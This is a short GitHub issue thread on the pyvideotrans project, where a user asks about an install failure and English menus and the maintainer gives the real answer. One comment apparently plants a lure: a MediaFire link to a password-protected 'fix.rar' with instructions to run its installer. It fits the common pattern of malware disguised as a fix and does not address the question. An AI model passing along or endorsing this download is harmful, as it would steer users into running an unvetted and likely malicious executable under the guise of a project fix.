### ISSUE TITLE
English UI 

### ISSUE THREAD

**Issue by GeoHaber** [jianchang512/pyvideotrans#521]
1) I was not able to install the app it complains that it is missing some library. 
2) Are there English menus as well for the UI

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jianchang512** [comment]
1. Use of the latest version 2.37
2. If the operating system is English, then the interface will be displayed in English, if not, fill in `en` as shown and reboot.
![image](https://github.com/user-attachments/assets/913db1a9-fe08-48e5-a229-4f12253e8d71)
